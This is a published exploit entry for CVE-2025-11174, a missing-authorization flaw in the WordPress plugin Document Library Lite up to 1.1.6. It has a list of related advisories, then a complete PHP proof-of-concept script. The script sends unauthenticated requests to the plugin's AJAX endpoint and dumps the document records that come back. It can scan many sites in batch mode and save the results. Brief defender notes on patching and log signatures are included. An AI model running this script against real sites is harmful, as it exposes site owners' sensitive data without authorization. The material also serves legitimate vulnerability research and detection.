| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for CVE-2025-11174 | 2 Nov 2025 06:57 | – | githubexploit | |
| CVE-2025-11174 | 2 Nov 2025 05:57 | – | circl | |
| WordPress plugin Document Library Lite 授权问题漏洞 | 1 Nov 2025 00:00 | – | cnnvd | |
| WordPress Document Library Lite plugin improper authorization vulnerability | 5 Nov 2025 00:00 | – | cnvd | |
| CVE-2025-11174 | 1 Nov 2025 01:47 | – | cve | |
| CVE-2025-11174 Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | 1 Nov 2025 01:47 | – | cvelist | |
| EUVD-2025-37407 | 1 Nov 2025 03:30 | – | euvd | |
| CVE-2025-11174 | 1 Nov 2025 02:15 | – | nvd | |
| WordPress Document Library Lite plugin <= 1.1.6 - Missing Authorization to Sensitive Information Exposure vulnerability | 3 Nov 2025 22:17 | – | patchstack | |
| PT-2025-44695 | 1 Nov 2025 00:00 | – | ptsecurity | |
=============================================================================================================================================
| # Title : WordPress Document Library Lite 1.1.6 Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/document-library-lite/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211137/ & CVE-2025-11174
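[+] Summary : The WordPress plugin “Document Library Lite” (versions up to and including 1.1.6, per CVE-2025-11174) fails to restrict access to an internal AJAX endpoint, allowing unauthenticated attackers to fetch document records and exposing sensitive metadata. For site owners, the fix is to update the plugin to a release later than 1.1.6; the request to look for in access logs is an unauthenticated POST to /wp-admin/admin-ajax.php carrying action=dll_load_posts.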
[+] POC : * Usage: php poc.php https://victim.com
php poc.php https://victim.com output.json
<?php
/**
* CVE-2025-11174 WordPress PoC
* Fixed Version By Indoushka
*/
/**
 * ANSI escape sequences used to colour the script's terminal output.
 *
 * Every constant is a raw SGR sequence written straight into echoed strings;
 * N resets the terminal to its default attributes.
 */
class Colors
{
    const R = "\033[0;31m"; // red
    const G = "\033[0;32m"; // green
    const Y = "\033[1;33m"; // bold yellow
    const B = "\033[0;34m"; // blue
    const M = "\033[0;35m"; // magenta
    const C = "\033[0;36m"; // cyan
    const N = "\033[0m";    // reset
}
/**
 * Prints the start-up banner to standard output.
 *
 * The output is a single echoed string: an ASCII-art logo wrapped in the red
 * colour sequence, a colour reset, then a plain-text caption naming
 * CVE-2025-11174 and the affected plugin. Nothing is returned.
 *
 * The literal below is whitespace-sensitive (its line breaks are part of the
 * output), so it is left exactly as written.
 */
function banner() {
echo Colors::R."
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
".Colors::N."
CVE-2025-11174 — Document Library Lite
Unauthenticated Information Disclosure PoC
==========================================
";
}
/**
 * Turns a user-supplied target into a base URL without a trailing slash.
 *
 * A value that does not already begin with "http://" or "https://"
 * (case-insensitive) gets "https://" prepended. All trailing "/" characters
 * are then stripped. No other validation of the host or path is performed.
 *
 * @param string $u Target as typed on the command line or read from a list.
 * @return string Base URL with a scheme and no trailing slash.
 */
function normalize($u)
{
    $hasScheme = preg_match('#^https?://#i', $u) === 1;
    $withScheme = $hasScheme ? $u : "https://" . $u;

    return rtrim($withScheme, "/");
}
/**
 * Sends one unauthenticated probe for CVE-2025-11174 and classifies the reply.
 *
 * The request is a POST to <target>/wp-admin/admin-ajax.php whose body is
 * "action=dll_load_posts"; no cookie or nonce is sent. A 200 response whose
 * decoded JSON has a "data" or "recordsTotal" key is reported as vulnerable,
 * and the decoded body is printed and returned.
 *
 * Defender notes:
 *  - The request shape above is what shows up in access logs: POST to
 *    /wp-admin/admin-ajax.php with action=dll_load_posts and no session.
 *    The User-Agent is a fixed string in this script, but it is
 *    client-controlled, so do not rely on it alone.
 *  - Certificate verification is disabled for the transfer, so the peer is
 *    not authenticated and a result obtained over an untrusted network path
 *    proves little about the real site.
 *  - On a positive result the decoded response is echoed in full; it is
 *    whatever the site disclosed and may be sensitive.
 *
 * @param string $t Target site; the scheme is optional (see normalize()).
 * @param bool   $v When true, also print the decoded JSON of a negative result.
 * @return array "vuln" => bool, plus "data" => decoded body once JSON was parsed.
 */
function poc($t, $v = false)
{
    $site = normalize($t);
    $endpoint = $site . "/wp-admin/admin-ajax.php";

    echo Colors::G . "[+] Target: " . Colors::N . $site . PHP_EOL;
    echo " Endpoint: " . $endpoint . PHP_EOL . PHP_EOL;

    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL => $endpoint,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => "action=dll_load_posts",
        CURLOPT_HTTPHEADER => [
            "User-Agent: CVE-2025-11174-Proof",
            "Content-Type: application/x-www-form-urlencoded",
        ],
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_FOLLOWLOCATION => true,
        // NOTE(review): peer certificate verification is turned off here.
        CURLOPT_SSL_VERIFYPEER => false,
    ]);

    // Status and error text must be read before the handle is closed.
    $body = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    $curlError = curl_error($curl);
    curl_close($curl);

    echo Colors::G . "[+] HTTP: " . Colors::N . $status . PHP_EOL . PHP_EOL;

    if ($curlError) {
        echo Colors::R . "[!] CURL ERROR: " . $curlError . Colors::N . PHP_EOL;
        return ["vuln" => false];
    }

    if ($status != 200) {
        echo Colors::Y . "[!] Unexpected status" . Colors::N . PHP_EOL;
        return ["vuln" => false];
    }

    $decoded = json_decode($body, true);
    if (json_last_error() !== JSON_ERROR_NONE) {
        echo Colors::G . "[+] No JSON returned — not vulnerable" . Colors::N . PHP_EOL;
        return ["vuln" => false];
    }

    // The verdict rests only on the presence of these two keys.
    $hasRecordKeys = isset($decoded["data"]) || isset($decoded["recordsTotal"]);

    if (!$hasRecordKeys) {
        echo Colors::G . "[+] Not vulnerable" . Colors::N . PHP_EOL;
        if ($v) {
            echo Colors::Y . "[Verbose] Data:" . Colors::N . PHP_EOL;
            echo json_encode($decoded, JSON_PRETTY_PRINT) . PHP_EOL;
        }
        return ["vuln" => false, "data" => $decoded];
    }

    echo Colors::R . "[!!!] VULNERABLE" . Colors::N . PHP_EOL . PHP_EOL;
    echo Colors::G . "[+] Retrieved Data:" . Colors::N . PHP_EOL;
    echo json_encode($decoded, JSON_PRETTY_PRINT) . PHP_EOL;

    return ["vuln" => true, "data" => $decoded];
}
/**
 * Reports whether both pcntl functions needed for the SIGINT handler exist.
 *
 * @return bool True only when pcntl_signal() and pcntl_async_signals() are
 *              both defined in this PHP build.
 */
function isPCNTL()
{
    foreach (["pcntl_signal", "pcntl_async_signals"] as $required) {
        if (!function_exists($required)) {
            return false;
        }
    }

    return true;
}
/**
 * CLI entry point: parses options, picks the target, runs the check, exits.
 *
 * Options read via getopt(): -v/--verbose, -h/--help, -o/--output <file>,
 * --batch (the target argument is a file holding one target per line) and
 * --no-banner.
 *
 * Exit status: 0 after --help, 0 after a batch run, 1 when no target is given
 * or the batch file is missing; for a single target, 0 when poc() reports
 * "vuln" and 1 otherwise.
 *
 * The output file, when requested, receives the JSON-encoded poc() result(s),
 * including any response data the site returned. It is written with
 * file_put_contents() and no explicit permissions are set.
 */
function main()
{
    global $argv;

    $opts = getopt("vho:", ["verbose", "help", "output:", "batch", "no-banner"]);

    if (!isset($opts["no-banner"])) {
        banner();
    }

    if (isset($opts["h"]) || isset($opts["help"])) {
        echo "Usage: php " . basename($argv[0]) . " [OPTIONS] TARGET\n\n";
        exit;
    }

    $verbose = isset($opts["v"]) || isset($opts["verbose"]);

    // Writes the result as pretty-printed JSON when -o/--output was supplied.
    $saveIfRequested = function ($payload) use ($opts) {
        if (isset($opts["o"]) || isset($opts["output"])) {
            $path = $opts["o"] ?? $opts["output"];
            file_put_contents($path, json_encode($payload, JSON_PRETTY_PRINT));
            echo Colors::G . "[+] Saved to: " . $path . Colors::N . PHP_EOL;
        }
    };

    // The target is the FIRST argument that does not start with "-".
    // NOTE(review): the scan runs over raw $argv, so an option value passed as
    // a separate word (for example the file name following -o) is also a
    // candidate and is chosen if it comes first.
    $target = null;
    foreach (array_slice($argv, 1) as $arg) {
        if ($arg[0] != "-") {
            $target = $arg;
            break;
        }
    }

    if (empty($target)) {
        echo Colors::R . "[!] ERROR: No Target Provided" . Colors::N . PHP_EOL;
        exit(1);
    }

    if (isset($opts["batch"])) {
        // In batch mode the positional argument names the list file.
        $listFile = $target;
        if (!file_exists($listFile)) {
            echo Colors::R . "[!] ERROR: Batch file not found: " . $listFile . Colors::N . PHP_EOL;
            exit(1);
        }

        $entries = file($listFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        echo Colors::G . "[+] Loaded " . count($entries) . " targets" . Colors::N . PHP_EOL . PHP_EOL;

        $results = [];
        foreach ($entries as $entry) {
            echo Colors::C . "[~] Testing " . $entry . Colors::N . PHP_EOL;
            $outcome = poc($entry, $verbose);
            $outcome["target"] = $entry;
            $results[] = $outcome;
            echo PHP_EOL;
        }

        $saveIfRequested($results);
        exit;
    }

    $outcome = poc($target, $verbose);
    $saveIfRequested($outcome);

    exit($outcome["vuln"] ? 0 : 1);
}
// Install a SIGINT (Ctrl+C) handler only when the pcntl functions exist;
// without them the script simply runs with PHP's default signal behaviour.
if (isPCNTL()) {
    $onInterrupt = function () {
        echo PHP_EOL . Colors::Y . "[!] Interrupted" . Colors::N . PHP_EOL;
        exit(130);
    };

    pcntl_async_signals(true);
    pcntl_signal(SIGINT, $onInterrupt);
}

// Hand control to the CLI entry point; it terminates the process itself.
main();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================